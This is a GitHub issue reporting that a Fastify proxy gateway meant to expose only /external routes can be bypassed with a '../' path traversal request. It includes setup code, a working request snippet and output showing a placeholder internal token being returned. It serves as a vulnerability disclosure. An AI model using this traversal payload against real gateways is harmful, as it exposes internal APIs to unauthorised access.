API whitelisting behind gateway  #132

@artur-ma

Description

This is not a real security breach I guess, but some companies rely on API gateways to whitelist the APIs that are exposed to the world.

For example, I would like to expose only those APIs that have /external prefix

'use strict'

const Fastify = require('fastify')

// "target" is the upstream service; it serves both internal and external routes
const target = Fastify({
  logger: false
})

// "server" is the gateway; only /external/* is meant to be reachable through it
const server = Fastify({
  logger: false
})

target.get('/internal/api/token', (request, reply) => {
  reply.send('Security token: 123')
})

target.get('/external/api/v1', (request, reply) => {
  reply.send('hello world')
})

const proxy = require('fastify-http-proxy')

// forward everything under /external on the gateway to /external on the upstream
server.register(proxy, {
  upstream: 'http://localhost:3001',
  prefix: '/external',
  rewritePrefix: '/external',
})

target.listen(3001, (err) => {
  if (err) {
    throw err
  }

  server.listen(3000, (err) => {
    if (err) {
      throw err
    }
  })
})

Then execute this snippet (does not work with cURL for some reason):

URL: http://127.0.0.1:3000/external/../internal/api/token

var request = require('request');
// the path is sent to the gateway verbatim, ".." included
request.get('http://127.0.0.1:3000/external/../internal/api/token', function (error, response) {
  if (error) throw new Error(error);
  console.log(response.body);
});

will result in:

$ node req.js 
Security token: 123
